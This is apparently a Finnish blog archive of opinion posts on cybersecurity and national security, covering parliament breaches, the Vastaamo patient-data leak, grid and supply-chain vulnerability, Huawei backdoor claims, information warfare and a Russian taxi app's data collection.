Mietitäänpä vielä Suomen tilannetta. Kun Norjassa paljastuu tietomurto, tieto kulkee varmasti pohjoismaiden ja muidenkin länsimaiden välillä. Suomessa on varmasti osattu epäillä jotain jo alkusyksystä. Nyt kerrotaan, että KRP on tehnyt tutkintaa loppusyksystä alkaen. Jostain syystä siitä päätettiin ilmoittaa juuri tänään, kertomatta silti varsinaisesti mitään.

Tieto tuli yllätyksenä myös kansanedustajille, jopa puolustusvaliokunnan jäsenille. Jos Suomea vastaan tehdään määrätietoinen verkkomurto, miksi valiokunnan jäsenet saavat kuulla siitä mediasta? Varmaan siksi, ettei KRP usko heidän pitävän salaisuuksia. Herää silti kysymys, mitä eduskunnassa on tehty murron paljastuttua, ja miten mahdolliset puhdistus/suojaustoimet ovat jääneet edustajilta huomaamatta? Eikö kukaan ole todellakaan huomannut mitään?

Olisi helppoa selvittää, onko asialla sama ryhmä ja sama tekniikka kuin Norjassa, ja kertoa se julkisesti. Tutkinnalliset syyt johtavat tälläkin kertaa siihen, ettei tutkintaa koskaan muodollisesti päätetä, jolloin siitä ei koskaan tarvitse kertoa tämän enempää.

Onneksi muiden maiden turvallisuusviranomaiset ovat avoimempia. Voimme lukea heidän tiedotteitaan sekä uutisia mediasta ja tehdä omat johtopäätöksemme Suomen tapahtumista. 

Tällä hetkellä johtopäätös on, että me suomalaiset olemme aikamoisia lampaita.

Lisäys 30.12.2020: Joku saattoi pahastua lammas-vertauksesta, mutta se tulee mieleen kun muistelee vuoden 2013 tapahtumia. Ulkoministeriön vakoiluohjelman paljastuttua ministeriön valtiosihteeri Pertti Torstila uhosi, että "Suomi aikoo läksyttää kunnolla ulkoministeriön tietoverkon vakoilijaa" kun tekijä selviää. En muista, että Suomi olisi esittänyt protestia tai muutakaan läksytystä Venäjälle ja Kiinalle senkään jälkeen, kun niiden syyllisyyttä pidettiin selvitettynä.

Lisäys 26.5.2026: Tässä tekijäksi paljastui Kiina.

perjantai 23. lokakuuta 2020

Vastaamo on tietosuojan painajainen - kyberturvallisuus on osa potilasturvallisuutta

Vastaamosta vuotaneet 40 000 potilastapausta tietoineen ovat likipitäen pahin tietosuojakatastrofi, jota voimme kuvitella. Seuraukset ovat sen mukaiset. Niistä olemme nähneet vasta jäävuoren huipun.

Oli odotettavissa, että vakava tietovuoto tapahtuu ennen pitkää. Niin paljon potilas- ym. tietoja käsitellään eri järjestelmissä, että inhimilliset mokat ovat väistämättömiä, eikä mikään GDPR-lainsäädäntö pysty täysin niitä estämään.

Vuoto olisi saanut olla pieni herätys koko alalle -- sellainen, jossa olisi vuotanut muutamia luottamuksellisia tietoja. Kokonaisen tietokannan vuotaminen kiristäjälle ja tietojen osittainen julkistus on kuin suoraan painajaisesta. Tällaista ei kukaan kaivannut.

Tapaus on niin merkittävä, että siitä irtoaa loputtomasti näkökulmia ja ajatuksia. Tässä muutamia.

Kuukausi sitten uutisoitiin saksalaiseen sairaalaan iskeneestä kiristysohjelmasta, joka johti epäsuorasti potilaan kuolemaan kun hänet jouduttiin siirtämään toiseen sairaalaan. Tapahtumaa pidettiin merkittävänä, koska ensi kertaa kyberturvallisuuden pettäminen oli johtanut ihmisen kuolemaan. On luultavaa, että psykiatrisen hoidon potilaiden tietojen vuotaminen tai uutisesta seuraava ahdistus, vaikka tiedot eivät koskaan tulisi julkisuuteen, voi tuottaa saman johtopäätöksen. 

Ahdistusta ei voi vähätellä. Kun AIDS tuli Suomeen, uutisissa kerrottiin suomalaisten tehneen itsemurhia, koska he pelkäsivät saaneensa kohtalokkaan taudin. Ruumiinavauksissa keneltäkään ei löydetty virusta.

Valvira valvoo terveydenhuoltoa ja alan ammattilaisten pätevyyttä. Tietojärjestelmät ovat asiakastietolain nojalla mukana tarkastuksissa, mutta työ on yksittäisen henkilön vastuulla. Nyt pitäisi olla selvää, että kyberturvallisuus on osa potilasturvallisuutta, joka pitää tarkistaa siinä missä työntekijöiden määrän riittävyys tai todistusten aitous.

Ennen GDPR:n voimaantuloa peloteltiin tietosuojaviranomaisilla, jotka tulevat tekemään yllätystarkastuksia yrityksiin. Onko näin tapahtunut? En ole kuullut yhdestäkään isosta tarkastuksesta. Resurssit ovat pienet, mutta turha pelottelu tarkastuksilla ei myöskään toimi. Oliko kukaan koskaan tarkastanut Vastaamon tietojärjestelmiä? Kenelle tarkastus olisi kuulunut?

Julkisten tietojen perusteella kyseessä on alkeellinen moka. Ei mitään ovelaa hakkeria, ei aiemmin tuntematonta tietoturva-aukkoa -- ei mitään muuta kuin alkeellinen, mahdollisesti nettiin avoimeksi jäänyt tietokanta, jollaisia lapsikin pystyy hakemaan vaikka Shodan-hakukoneella. Koska tiedot ovat vanhoja, kyse saattaa olla edellisestä tietojärjestelmästä tai testi/kehityskannasta, joka oli vain "unohtunut" linjalle. Salasana root ja käyttäjätunnus root kertovat täydellisestä huolimattomuudesta.

Jos kanta löytyy näin helposti, kuka muu sen on mahdollisesti löytänyt? Muut hakkerit tai valtiolliset tiedustelupalvelut, jotka etsivät tällaista aineistoa työkseen?

Kuinka arvokasta heille olisikaan päättäjien tai avainhenkilöiden sairaskertomukset, niin kiristyksen kuin mielenterveyden manipuloinnin kannalta. Onko tällaista mahdollisesti jo tapahtunut?

Kaikille muille tapaus jättää syvän epäluulon: uskallanko kertoa ongelmistani lääkäreille tai terapeuteille, jos on vaara, että tiedot päätyvät julkisuuteen?

Nyt vaakalaudalla on koko terveydenhuollon uskottavuus ja terapian tulevaisuus.

Ja kaikki tämä vain auki jääneen tietokannan vuoksi. 

perjantai 5. kesäkuuta 2020

Kuinka pakottaa Suomi polvilleen?

Puolustusasiat ovat niin tärkeitä, ettei niihin kaivata maallikoiden mielipiteitä. Sotilaat tietävät parhaiten, mitä vastapuolen sotilaat ajattelevat. Siksi kansanedustajatkin ovat asiasta poikkeuksellisen yksimielisiä.

Kaikesta huolimatta annan nyt mielikuvituksen lentää. Pontimena oli viime viikon A-talkin keskustelu. Hävittäjäkauppaa analysoimaan studioon oli kutsuttu neljä mieskansanedustajaa, jotka kaikki olivat samaa mieltä: uudet hävittäjät tarvitaan, eikä taloustilanne saa vaikuttaa.

Sotilaalliset uhkakuvat tulevat historiasta. Jos Suomea vielä joskus kohtaa aseellinen konflikti, se on todennäköisesti aivan erilainen kuin mihin olemme valmistautuneet. Digitalisaatio on mullistanut myös sodankäynnin. Uusia hävittäjiä tarvitaan tunnistustehtäviin, elektronisen sodankäynnin ja tiedustelun alustaksi ja kansaa hurmaaviin lentonäytöksiin, mutta lentokone lentokonetta vastaan (dog-fight) on äärimmäisen epätodennäköinen. Viimeksi sellainen nähtiin kai 1990-luvun lopulla Balkanin sodassa.

Hyökkääjän kannalta paras sota on sellainen, jota ei tarvitse käydä, tai ainakin joka voitetaan ilman aseellista yhteenottoa. Miksi lähettää armeija taisteluun, joka tulee kalliiksi ja uhraa sotilaita, jos vihollinen saadaan taipumaan tahtoon muilla keinoilla?

Näiden keinojen torjumiseen pitäisi panostaa huomattavasti nykyistä enemmän. Kyse on tietenkin kyberturvallisuudesta ja nettivaikuttamisesta, karkeimmillaan trollauksesta mutta myös sen monista hienostuneemmista muodoista, joita emme useinkaan edes havaitse.

Yhdysvallat on hyökännyt useita kertoja häpeilemättä ja avoimesti mainostaen Iranin tietojärjestelmiin. Hiljattain Iran iski vuorostaan Israeliin ja päinvastoin. Financial Timesin juttu tapahtumista on kiinnostava. Molemminpuolisista hyökkäyksistä huolimatta en huomannut, että asiaa olisi Suomen mediassa noteerattu lainkaan.

Kyse olikin lähinnä koputtelusta: tiedämme, missä asut -- käyttäydy siivosti. Muuten iskemme oikeasti.

Harva ymmärtää, miten haavoittuva nykypäivän Suomi on. Yhteiskunnan ja talouden toiminnot ovat erittäin keskittyneitä. Esimerkiksi lääkehuolto on kahden yhtiön varassa. Niistä toisen varasto on Espoossa, toisen Tampereella. Viimeksi kun kävin paikalla, oli vielä rauhallista:

Puolet Suomen lääkehuollosta.
Matalalla lentävät risteilyohjukset, räjähteillä lastatut lennokkiparvet tai ballistiset ohjukset ovat liki mahdottomia torjua uusimmillakaan hävittäjillä (esim. tämä 10-kertaisella äänennopeudella lentävä hypersoninen Kinzhal). Syksyllä 2017 saimme esimakua siitä, mitä lääkehuollon katkeaminen voi aiheuttaa. Silloin kyseessä oli vain tahaton tietojärjestelmähäiriö Oriolan tehtaalla, mutta sen vaikutukset kestivät kuukausia ja Suomi pelastui vain, koska Tamro pystyi paikkaamaan osan kilpailijansa jakelusta.

Sähkönjakelu on toinen herkkä kohta. Muutama keskeinen runkolinja tai ison voimalan tuhoaminen syöksisi Suomen kaaokseen. Kotirintama ei kestäisi lääkehuollon ja sähkön loppumista. Toisin kuin talvi- ja jatkosodissa, maalle ei voi enää paeta.

Päivittäistavarakauppa on sekin kahden suuren keskusliikkeen hallussa. Yhden jättivaraston lamauttaminen saisi vessapaperin oikeasti hupenemaan kaupoista. Maaliskuussa näimme, mitä pelkkä epäily wc-paperin saatavuudesta riittää aiheuttamaan.

Maaliskuussa hamstrattiin wc-paperia Triplan City-Marketissa.
Jos tilanne kiristyisi ja Suomi haluttaisiin polvilleen, vihollinen voisi tuhota aluksi yhden voimalan tai varaston, ja kysyä sen jälkeen, vieläkö halutaan jatkaa. Mitä vastaisimme? Olisiko miljardien sotakoneista apua?

Some-keskustelussa sain kuulla, että tällainen skenaario on ihan typerää, eihän Syyriaa tai Irakia ole lannistettu muutamalla ohjuksella. Ei, koska ne eivät olleet kehittyneitä länsimaita, joissa kaikki toiminta on keskitetty ja riippuvuus sähköstä/nettiyhteyksistä täydellistä. Syyria, Irak ja muut kriisialueet ovat resilienttejä, koska väestö on tottunut kestämään kovia. Siksi Yhdysvallat ja Venäjä käyttävät aluetta oman sotatekniikkansa myyntinäyttelynä.

Suomen tilanne olisi pahan päivän tullen aivan erilainen.

Suomalaisten turvallisuusajattelua ohjaavat talvi- ja jatkosodan muistot. Venäjällä historian painolastina ovat niin mongolien, Napoleonin kuin Natsi-Saksankin hyökkäykset; nykyisin pelko Naton piirittämästä karhulinnakkeesta. Tämän muistaen parantaisiko USA:n uusimpien hävittäjien tuominen rajalle todella Suomen turvallisuutta?

Toivottavasti pahaa päivää ei koskaan tule. Toivottavasti osaamme varautua oikeanlaisiin uhkiin, emmekä tuijota yksinomaan peräpeiliin.

Jk. Fingridin sivu (grafiikka aivan sivun lopussa) antaa reaaliaikaisen tilannekuvan Suomen sähköntuotannosta. Nytkin, kesäkuun alussa, olemme täysin tuontisähkön varassa.

Sähkön tuonti ja vienti perjantaina 5.6.2020 klo 16.30

maanantai 17. kesäkuuta 2019

Laaja sähkökatko on kyberturvallisuuden painajainen

Argentiinan ja Uruguayn sähkökatko jätti 48 miljoonaa ihmistä pimeään ja vaille tuttuja palveluita. Onneksi katko sattui sunnuntaiaamuna eikä näissä maissa talvellakaan olla sähkölämmityksen varassa. Pimeä ja hiljainen kaupunki pelotti kuitenkin ihmisiä, eikä monikaan uskaltanut poistua kodistaan. Tv-uutisissa joku kertoi kantaneensa isoäidin alas asunnosta, koska hissit eivät toimineet.

Argentiinassa toteutui kyberturvallisuuden painajainen. Laajamittainen sähkökatko voisi pitkittyessään olla siviilien kannalta pahempi kriisi kuin perinteiseen sotaan liittyvät pommitukset. Kaikki toimii nykyään sähköllä. Suomen talvessa sen saatavuus on suoranainen elinehto.

Vuosi sitten pohdin kesähelteillä Kyberuhkia ja somesotaa -kirjaa varten mitä tapahtuisi, jos laajamittainen sähkökatko osuisi Suomeen. Kun kirja syksyllä ilmestyi kuulin väitteitä, että uhkakuvat olivat teoreettisia ja liioiteltuja. Argentiinan olosuhteet toivat spekulaationi elävästi takaisin. Juuri tällaista itsekin arvelin tapahtuvan.

Vasta kirjaa tehdessäni ymmärsin, miten monimutkainen järjestelmä sähköverkko on. Sähköä pitää tuottaa ja kuluttaa yhtä paljon, ja verkon osien on kuljettava 50 hertsin vaihtojännitteen tahdissa. Suomen runkoverkko ei ole kaatunut sitten 1970-luvun, mutta ainakin yksi läheltä piti -tilanne löytyy tämän vuosituhannen alusta.

Suomen kantaverkko on rakennettu kestämään yhden laajan häiriön, esimerkiksi voimalan ennakoimattoman alasajon tai suuren siirtolinjan katkeamisen. Jos katkoksia sattuu samanaikaisesti muuallakin, joudutaan vaikeuksiin. Verkkoon syntyy helposti ns. kaskadihäiriö, jossa sähkön tuotanto ei vastaa enää kysyntää, ja jakeluasemat joutuvat kytkemään itsensä irti verkosta tekniikkaa suojatakseen. Sen seurauksena kuorma siirtyy muille asemille, jotka joutuvat tekemään saman. Häiriö laajenee kuin jonossa kaatuvat dominonappulat.

Sähköjä ei myöskään palauteta napista painamalla. Voimalan käynnistäminen ja kytkeminen verkkoon pitää tehdä hallitusti, jotta suojareleet eivät laukea. Jostain toimivasta verkosta tarvitaan ns. siemensähköä. Suomen tapauksessa sitä saadaan naapurimaista, edellyttäen että häiriö ei ole levinnyt sinne asti.

Jakeluverkot ovat samanlaisia kaikkialla. Silti Suomessa vastaava häiriö olisi "liki mahdoton", sanoi energiateollisuuden asiantuntija. Kop, kop!

Itse asiassa heinäkuussa 2018 sähkö oli vähällä loppua Suomesta Olkiluodon sähköaseman virtamuuntajan tulipalon ja sähköaseman korjaustöiden seurauksena. Seuraavalla viikolla myös Loviisan ydinvoimalaa jouduttiin rajoittamaan, koska poistoveden lämpötila ei enää pysynyt ympäristölupaehtojen rajoissa. Onneksi ongelmat eivät osuneet samalle päivälle.

Suomen varautumissuunnitelmat on tehty talviolosuhteita ajatellen. Tuskin kukaan osasi kuvitella, että myös helteistä voisi tulla ongelma. Se kertoo, miten yllättäviä kyberturvallisuuteen liittyvät uhkat ovat.

Sattumaa tai ei, paria päivää aikaisemmin oli kerrottu Yhdysvaltojen "miinoittaneen" Venäjän sähköverkon haittaohjelmilla. Jo aiemmin Yhdysvallat on väittänyt Venäjän ainakin yrittäneen samaa heidän verkoilleen. Mielikuvitus pääsee valloilleen kun pohtii, mahtoiko kyseessä olla Yhdysvaltojen karkuun päässyt testi Venezuelan sähköverkkoa vastaan.

Kriisitilanteessa Suomi olisi helppo saada polvilleen sähköverkkoon hyökkäämällä, joko verkon kautta tai muutamalla risteilyohjuksella. Näihin uhkiin parhaatkaan hävittäjät eivät tarjoa puolustuskeinoa.

Lisäys klo 13.30: HS artikkeli sähkökatkon mahdollisuudesta Suomessa. Se mainitsee kyberuhkat, mutta ei tahallista sabotaasia tai ohjusiskua voimalinjojen tuhoamiseksi.

keskiviikko 22. toukokuuta 2019

Onko Kiinan takaovista todisteita?

Yhdysvaltojen päätös kieltää yritysten yhteistyö Huawein kanssa on järeä toimi, joka osuu syyttömiin suomalaisiin. Googlen osalta kielto tuntuu pelkältä kiusanteolta: ei ole edes väitetty, että älypuhelimet vakoilisivat käyttäjiä. Jos jotain urkitaan, se tapahtuu pilvipalveluista, jotka ovat edelleen USA:n hallinnassa. Huawein puhelinbisnekseen isketään, koska se menestyy liian hyvin, ja koska uudet puhelinmallit ovat parempia kuin USA:n omat iPhonet. Huawein puhelimia ei myydä Yhdysvalloissa, mutta muualla maailmassa ne nousivat kakkossijalle ja pudottivat Applen kolmanneksi.

Verkon aktiivilaitteiden osalta tilanne on erilainen. Mikäli runkoverkon reitittimeen tai 5G-tukiasemaan todella laitettaisiin takaovi, sen kautta voisi vakoilla liikennettä ja kyberhyökkäyksen sattuessa lamaannuttaa koko verkon. Virallisen version mukaan Yhdysvallat on huolissaan juuri tästä vaihtoehdosta. Mutta onko se totta? Onko siitä mitään todisteita? Jos on, miksei niitä julkaista?

Loogisesti ajateltuna kiinalaisten kannattaisi lisätä laitteisiin takaovia. Kun kyse on kansallisesta turvallisuudesta, kaikki keinot ovat sallittuja. Takaoven löytäminen on liki mahdotonta, sillä se voidaan toteuttaa koodinpätkänä, joka aktivoidaan esimerkiksi tietyllä bittisekvenssillä. Ilman tuota herätettä takaovi on täysin näkymätön. Takaovi voidaan toteuttaa myös pienellä elektronisella komponentilla, mutta silloin sen paljastumisen vaara on ilmeinen.

Uutistoimisto Bloomberg kertoi viime syksynä takaovista, jotka oli löydetty Kiinassa alihankintana valmistetuista emolevyistä, ja joita käytettiin mm. Applen ja Amazonin palvelinkeskuksissa. Juttu oli melkoinen skuuppi -- harmi vain, ettei kukaan ole pystynyt vahvistamaan havaintoja.

Se ei kuitenkaan estänyt Bloombergia tarttumasta uudelleen aiheeseen. Pari viikkoa sitten Italian Vodafonen väitettiin löytäneen jo kymmenen vuotta sitten Huawein laitteista takaovia. Tämäkään uutinen ei ollut kovin vakuuttava; esimerkiksi Register-verkkojulkaisu ampui sen alas samantien. Uutisointia ihmettelivät muutkin.

Mikään ei silti lannista Bloombergia. Tuoreessa kolumnissa kirjoittaja ylistää Trumpin päätöstä ja hehkuttaa, miten teknologian kylmässä sodassa tarvitaan uhrauksia Kiinan uhkan torjumiseksi. Kolumnisti siteeraa nimetöntä kansallisen turvallisuuden virkailijaa: "One U.S. national security official told me that China would be able to bring U.S. cities to a standstill “with the push of a button” if American cell towers were outfitted with Huawei equipment." Tällainen pelottelu on tietenkin roskaa.

Äskeittäin hollantilainen sanomalehti uutisoi uudesta Huawein takaovesta, lisään linkin tähän kun löydän tai kun asia varmistuu. No nyt löytyi: de Volkskrant -lehden uutinen 16.5.2019: Huawei mogelijk betrokken bij Chinese spionage in Nederland. Nähdäkseni tästä ei ole uutisoitu muualla, joten tieto on yhä epävarma.

Mitä otsikon kysymykseen tulee, niin "jury is still out" sanoisi amerikkalainen.

Takaoven paljastuminen olisi paha isku laitetoimittajan luotettavuudelle. Itse uskon, että takaovet toteutetaan mieluummin ohjelmointivirheinä, jotka voidaan myöhemmin selittää parhain päin. Ja tämän pelin amerikkalaiset osaavat kiinalaisiakin paremmin. Jostain syystä Ciscon reitittimistä löytyy usein vakaviakin ohjelmointivirheitä, tuorein niistä pari viikkoa sitten: Sinister secret backdoor found in networking gear perfect for governement espionage.

Kuten tiedustelussa ja verkkovakoilussa yleensäkin, elämme varjojen maailmassa. On luultavaa, että niin amerikkalaisten kuin kiinalaistenkin laitteissa on piilotettuja toimintoja. Konkreettisia todisteita ei paljasteta, koska samalla vaarantuisi oma toiminta. Todisteet on voitu saada urkinnalla tai tavalla, joka paljastaisi liikaa omasta toiminnasta.

Me suomalaiset emme ole lännen tiedustelun sisäpiirissä, joten me saamme tiedon luultavasti viimeisten joukossa. Suojelupoliisin varoituksesta päätellen jotain tietoja on kuitenkin tihkunut.

Sopassa on mukana aimo annos kauppa... ei kun teknologiasotaa, jolla kiinalaisia yritetään estää harppaamasta lännen ohi teknologiseen johtoon. Sen vaikutukset olisivat niin suuria, että likaisetkin keinot ovat lännen näkökulmasta hyväksyttäviä.

keskiviikko 23. tammikuuta 2019

Huawei on vain Kiina-ilmiön jäävuoren huippu

Huawei on noussut uudenlaisen Kiina-ilmiön keihäänkärjeksi. Yhdysvallat varoittaa länsimaita hankkimasta Huawein verkkolaitteita ja tukiasemia, koska epäilee yhtiön olevan maan johdon määräysvallassa. Asia ei ole uusi, mutta nyt siitä on noussut kansainvälinen kohu. Huawein perustajan tyttären pidättäminen Kanadassa Iranin vientikiellon rikkomisesta on nostanut kiistan uudelle, poliittiselle tasolle.

Uskon, että Yhdysvalloilla on tiedustelutietoa, jonka perusteella varoitukset on annettu. Tätä tukee se, että maan läheisimmät kumppanit ovat ryhtyneet konkreettisiin tekoihin Huawein torppaamiseksi. British Telecom purkaa verkostaan Huawein 4G-laitteita, Norjassa Huaweitä ei päästetty 5G-kilpailuun; Kanada harkitsee samaa. Suomeen näin salainen tiedustelutieto päätyy viimeisenä, joten meillä operaattorit joutuvat luottamaan kiinalaisyhtiöiden vakuutteluihin. Operaattoreilla on lainmukainen velvollisuus huolehtia verkkojensa turvallisuudesta, mutta vaatimus ei voi kattaa salaista tiedustelutietoa.

Julkista näyttöä kiinalaisten epäreilusta toiminnasta ei ole. Tiedetään kuitenkin, että Kiina paaluttaa asemiaan tulevaisuuden markkinoista päättäväisesti ja keinoja kaihtamatta mm. Afrikan luonnovaroista kilpaillessaan. Se voi veljeillä vapaasti diktaattorien kanssa ja lahjoa päättäjiä kaivossopimusten saamiseksi, koska kotimaan kansalaismielipiteestä ei tarvitse välittää.

Yhdysvalloilla on tähän asti ollut etulyöntiasema teknologisen kehityksen veturina ja internetin ykkösmaana. Laitteisto on kiinalaisten salainen ase: 90 % tietotekniikasta valmistetaan Kiinan tehtaissa. Olisi vain loogista käyttää strategista kilpailuetua hyödyksi ja painostaa laitevalmistajat lisäämään emolevyille sekä prosessoreihin piilotettuja toimintoja. Niitä voitaisiin käyttää tietoliikenteen salakuunteluun tai mahdollisen kriisin hetkellä tiedon sabotointiin. Laitetasolle upotettuja takaovia tai vakoilutoimintoja on mahdotonta havaita ohjelmallisesti.

Yhdysvalloilla on pitkä kokemus vastaavasta toiminnasta. Se on hyödyntänyt laitetoimituksia ja nettipalveluita omien etujensa ajamiseen. Siksi se tietää muita paremmin, mitä vaaroja Kiinan kehitykseen liittyy. Yhdysvallat pelkää joutuvansa pian maistamaan omaa lääkettään.

Huawei on pelkkä jäävuoren huippu. Se on nostettu tikun nokkaan, koska juuri nyt operaattorit tekevät suuria investointeja 5G-verkkoihin, ja Huawein tarjooma on erittäin kilpailukykyistä. Laitteet ovat teknisesti edistyksellisiä ja (ilmeisesti Kiinan valtion rahoituksella) myös edullisia. Nyt tehdyt hankintapäätökset vaikuttavat mobiiliverkkojen turvallisuuteen ainakin kymmenen vuoden ajan.

Yhdysvallat pelkää Kiinan teknovakoilua monella muullakin rintamalla. Joitakin valvontakameroita on kielletty ja viranomisten käyttämien DJI:n lennokkien on epäilty vakoilevan kriittistä infrastruktuuria. Muutama vuosi sitten Lenovon tietokoneet olivat epäiltyjen listalla ja niiden hankinta valtionhallintoon kiellettiin. Ja kun Motorola myi 2010 verkkoliiketoimintansa, kaupat tehtiin Nokian kanssa, vaikka Huawei tarjosi 100 miljoonaa dollaria enemmän.

Samaan sarjaan kytkeytyy viimekesäinen episodi, jossa EU julisti Yhdysvalloilta saamiensa tietojen perusteella Kaspersky Labin tietoturvaohjelmat "haitallisiksi". Lännessä pelätään Kiinan lisäksi myös Venäjän urkintaa. Taaskaan meille ei kerrota perusteluita eikä näytetä todisteita. Olemme pimennossa.

Onko meillä mitään todisteita Kiinan epäreilusta pelistä? Viime lokakuussa Bloomberg pudotti uutispommin väittämällä, että Supermicron valmistamista emolevyistä olisi löytynyt vakoilusiruja. Supermicro on taiwanilaisten perustama yritys, jonka pääkonttori on Piilaaksossa ja tehtaat Kiinassa. Yhtiön emolevyjä käytetään erityisesti datakeskuksissa, mm. Amazonilla ja Applella sekä valtion omissa yksiköissä aina CIA:ta myöten. Vakoilusirulla näissä laitteissa olisi järisyttäviä seurauksia.

Apple, Amazon, Supermicro sekä kansallisen turvallisuuden virasto tutkivat asiaa, mutta eivät löytäneet mitään todisteita. Eri asia on, kertoisivatko ne löydöistään siinäkään tapauksessa, että vakoilulaitteita löytyisi. Bloomberg ei ole vetänyt uutistaan takaisin, mutta ei myöskään esittänyt omia todisteita sen tueksi. Kaikki perustuu luottamuksellisiin lähteisiin.

Sen sijaan Bloomberg julkaisi toisen uutisen, jonka mukaan Kiinan tiedustelu oli velvoittanut alihankkijat asentamaan vakoilulaitteita SuperMicron alihankkijoiltaan tilaamiin emolevyihin. Tiedot olivat peräisin israelilaiselta tutkijalta. Ilmeisesti vakoiluosa oli emolevyjen Ethernet-portissa eikä Supermicro ollut ainoa valmistaja, jonka laitteisiin tällaisia lisäyksiä oli tehty. Bloombergin mukaan Yhdysvaltojen NSA oli käyttänyt itse samanlaista tekniikkaa.

Jotain on selvästi tekeillä ja kyse on todella isoista asioista: vakoilusta, kybersotaan valmistautumisesta sekä kansallisesta turvallisuudesta. Meille suomalaisille epäluulo on hyväksi, sillä se parantaa Nokian ja Ericssonin asemia 5G-laitekilpailussa.

Yksittäisen kansalaisen ei tarvitse olla huolissaan Huawei- tai Honor-älypuhelimestaan. Sen vakoilu ei ketään kiinnosta. Mutta kun kyse on valtiotason asioista tai yritysten tuotekehityksestä, kannattaa lähteä siihen, ettei mobiililaitteisiin voi aukottomasti luottaa. Kannattaa käyttää vahvoja salaustekniikoita (ei niitäkään amerikkalaisilla ohjelmilla) ja pyrkiä käsittelemään salaista tietoa perinteisin menetelmin, ilman verkkoja.

Olemme astuneet uuteen aikakauteen, jossa teknologia liittyy oleellisesti Yhdysvaltojen ja Kiinan väliseen kamppailuun talousmahdista ja vaikutusvallasta.

perjantai 7. joulukuuta 2018

Rokotusvastaisuus ja infosota

"Olen akateemisesti koulutettu hyvä äiti - siksi en rokota lapsiani. Jos pöpö iskee, sairastamme ja toivumme. Koska keho osaa toimia. Uhkailu sosiaalietuuksien poistamisella rokottamattomilta on perusoikeuksien polkemista."

Siinä tiivistetysti Helsingin Sanomissa itsenäisyyspäivänä julkaistun mielipidekirjoituksen ydin.

HS mielipidekirjoituksen alkua 6.12.2018
Tekstissä kolmen lapsen äidiksi esittäytyvä, ulkomailla asuva ja Suomeen paluuta harkitseva nainen kertoo, miksi ei ole antanut rokottaa lapsiaan.

Kirjoituksen perässä on jo 371 lukijakommenttia, joista lähes jokaisessa äidin ajatukset tuomitaan vastuuttomiksi. Toimitus lienee tyytyväinen kirjoituksen herättämästä web-liikenteestä ja keskustelusta.

On vaikea uskoa kirjoittajaa akateemisesti koulutetuksi, niin monta loogista virhettä hänen tekstiinsä sisältyy. Ajatus siitä, että keho toipuu sairauksista, on erikoinen -- silloinhan lääketiede on turhaa. Toipumisista voisi kysyä vaikka läheisensä syövälle menettäneiltä. Lääketiedettä tarvitaan juuri siksi, että ihminen ei toivu sairauksista ilman apua.

"Ennenkään ei rokotuksia ollut ja silti ihmiset pärjäsivät" henkiset ajatukset ovat nettikeskusteluissa yleisiä. Niin, osa pärjäsi, mutta varsinkin lasten kohdalla kuolleisuus oli järkyttävän korkea. Pieni osa selvisi aikuisiksi, mutta pelkästään heidän huomiointi on ns. selviämisharhan mukainen ajatusvirhe.

Voisi kirjoittaa paljonkin laumasuojan merkityksestä tai siitä, miten omilla lapsilla itsestään parantuva rokko voi tarttua toiseen, jolle se on heikomman vastustuskyvyn vuoksi kohtalokas. Tai siitä, että jos ihminen haluaa päättää asioistaan itse, hänen on myös kannettava niiden seuraukset ja otettava vastuu muista, joihin hänen tekonsa vaikuttavat. Ja siitä, miten muodikasta on vetäytyä perusoikeuksien taakse, kun joku haluaa puhua velvollisuuksista tai yhteisestä edusta. Mutta antaa sen olla, nämä näkemykset tulevat hyvin esille lukijoiden kommenteissa.

Itselleni heräsi epäily, että näin provosoiva kirjoitus saattaa olla ulkovaltojen informaatiovaikuttamista, jolla pyritään lietsomaan eripuraa suomalaisiin ja vähentämään heidän luottamustaan viranomaisiin. Onko vain sattumaa, että kirjoitus julkaistaan juuri itsenäisyyspäivänä? Tai se, että kirjoittaja kertoo asuvansa nyt ulkomailla?

Kirjoitus on luonteensa vuoksi julkaistu nimimerkillä. Helsingin Sanomat vastaa julkaisemistaan teksteistä ja pyrkii siksi varmistamaan kirjoittajan todellisen henkilöllisyyden. Toivottavasti työ on tässä tapauksessa tehty riittävän huolellisesti, jotta Hesaria ei valjasteta infosodan tahattomaksi desantiksi.

Kun seuraavan kerran näet netissä tai lehdessä vahvoja mielipiteitä ajankohtaisista aiheista kysy itseltäsi, voisiko kyseessä olla tahallinen vaikuttamisyritys -- ja suhtaudu tekstiin sen mukaisesti. 

tiistai 13. marraskuuta 2018

Kohu Yango -taksisovelluksesta on täynnä kysymyksiä

Helsingin Sanomat uutisoi toissapäivänä, miten venäläisen Yandexin taksisovellus haluaa tavallista enemmän oikeuksia käyttäjän älypuhelimeen. Vaikka yhtiön kotipaikka on Hollannissa, on mahdollista (suorastaan luultavaa) että henkilötietoja päätyy Venäjälle.

MTV pisti vielä paremmaksi. Sen uutisessa siteerattiin Liettuan varapuolustusministeriä, jonka mukaan valtavat määrät henkilötietoja siirtyy hyvin kryptattuna Venäjälle jonnekin Jekaterinburgin lähistölle. Ohjelma myös jatkaa GPS-tietojen lähettämistä senkin jälkeen, kun käyttö on lopetettu.

"Vaikka käyttäjä lopettaisi Yandex-taksisovelluksen, se pysyy aktiivisena".
Tämä kaikki herättää kysymyksiä. On täysin mahdollista, että venäläinen taksisovellus urkkii käyttäjien älypuhelimia ja välittää tietoja Venäjälle ties mihin tarkoituksiin.

Tiedetään, että Uber-sovellus on urkkinut puhelimista tietoja, joiden perusteella matkan hintaa on nostettu esimerkiksi niin, että kun akku on lähes lopussa, Uber näyttää kyydille kalliimman hinnan, koska silloin asiakas on silloin valmis maksamaan enemmän saadakseen auton heti.

Muutama vuosi sitten Uberin sovellus keräsi niin paljon tietoa, että koodiin perehtynyt tutkija kutsui sitä haittaohjelmaksi. Uber "soitti kotiin" ja välitti tietoja, joihin se ei ollut pyytänyt edes lupaa: soittohistorian, käytetyt wifi-tukiasemat, sijainnit, laite-id:t, jopa lähistöllä kuuluneet wlan-verkot tunnuksineen ja taajuuksineen. Sitten hakkeri murtautui Uberiin, varasti 57 miljoonan käyttäjän tiedot ja kiristi niillä rahaa. Uber maksoi hakkerin hiljaiseksi ja pimitti tapahtuneen, kunnes se vuoti julkisuuteen 2017 ja johti mm. toimitusjohtajan potkuihin.

Uutisen esittämillä tiedoilla vastaava johtopäätös Yangosta on kuitenkin ennenaikainen.

